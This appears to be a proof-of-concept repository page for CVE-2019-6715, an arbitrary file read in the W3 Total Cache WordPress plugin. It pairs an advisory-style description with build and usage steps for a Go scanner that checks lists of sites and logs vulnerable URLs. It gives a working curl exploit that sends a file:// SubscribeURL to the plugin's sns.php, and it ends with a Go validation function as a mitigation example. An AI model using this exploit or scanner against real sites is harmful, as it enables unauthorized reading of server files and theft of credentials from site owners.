CVE-2019-6715 PoC — WordPress W3 Total Cache Plugin Information Disclosure Vulnerability

Associated Vulnerability
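Title: WordPress W3 Total Cache Plugin Information Disclosure Vulnerability (CVE-2019-6715)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. The platform supports setting up personal blog sites on servers running PHP and MySQL. The W3 Total Cache plugin is an SEO (search engine optimization) plugin used with it. The pub/sns.php file in versions of the WordPress W3 Total Cache plugin before 0.9.4 contains an information disclosure vulnerability. The vulnerability stems from configuration or similar errors during the operation of the network system or product. An unauthenticated attacker can exploit it to obtain sensitive information from the affected component.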
Readme
# cve-2019-6715

### Shout out to TomNomNom for 99.9% of his code....

### Build

```
go get github.com/fatih/color
go build
```

### Usage

```
cat list.txt | ./2019-6715
```

All vulnerable URLs are logged in text.log


CVE 2019-6715
---

Description: pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.

Vulnerability Type: arbitrary file read

Vendor of Product: WordPress W3 Total Cache plugin by Frederick Townes

Affected Product Code Base: W3 Total Cache - 0.9.2.6 - 0.9.3, fixed in 0.9.4

Affected Component: Affected source code file: w3-total-cache/pub/sns.php

Exploit - PoC:
---


```
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php
```
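
The description above attributes the file read to the `SubscribeURL` field, and the PoC supplies a `file://` value there. As an added example (not the plugin's actual fix and not code from this repository), the Go function below shows the kind of check a handler can apply before fetching that URL; the names `CheckSubscribeURL`, `snsMessage` and `snsHost`, and the Amazon SNS host pattern, are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"regexp"
)

// snsHost is an assumed allowlist pattern for regional Amazon SNS endpoints.
var snsHost = regexp.MustCompile(`^sns\.[a-z0-9-]+\.amazonaws\.com(\.cn)?$`)

// snsMessage holds the two fields of the notification body that matter here.
type snsMessage struct {
	Type         string `json:"Type"`
	SubscribeURL string `json:"SubscribeURL"`
}

// CheckSubscribeURL parses a request body and returns the SubscribeURL only
// if it is safe to fetch: https scheme, no userinfo, allowlisted SNS host.
func CheckSubscribeURL(body []byte) (string, error) {
	var m snsMessage
	if err := json.Unmarshal(body, &m); err != nil {
		return "", fmt.Errorf("invalid JSON: %w", err)
	}
	if m.Type != "SubscriptionConfirmation" {
		return "", fmt.Errorf("unexpected message type %q", m.Type)
	}
	u, err := url.Parse(m.SubscribeURL)
	if err != nil {
		return "", fmt.Errorf("unparseable SubscribeURL: %w", err)
	}
	// Rejects file:// and every other non-https scheme before any fetch.
	if u.Scheme != "https" {
		return "", fmt.Errorf("scheme %q rejected", u.Scheme)
	}
	// Userinfo ("allowed-host@other-host") and look-alike suffixes are refused.
	if u.User != nil || !snsHost.MatchString(u.Hostname()) {
		return "", fmt.Errorf("host %q rejected", u.Host)
	}
	return u.String(), nil
}

func main() {
	// Constructed sample body carrying the scheme used in the PoC above.
	_, err := CheckSubscribeURL([]byte(`{"Type":"SubscriptionConfirmation","SubscribeURL":"file://file_path"}`))
	fmt.Println("rejected:", err)
}
```
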
File Snapshot

```
[4.0K] /data/pocs/d72ec9453e234fbf19817374b069362dcee74d8e
├── [2.5K] main.go
└── [1020] README.md

0 directories, 2 files
```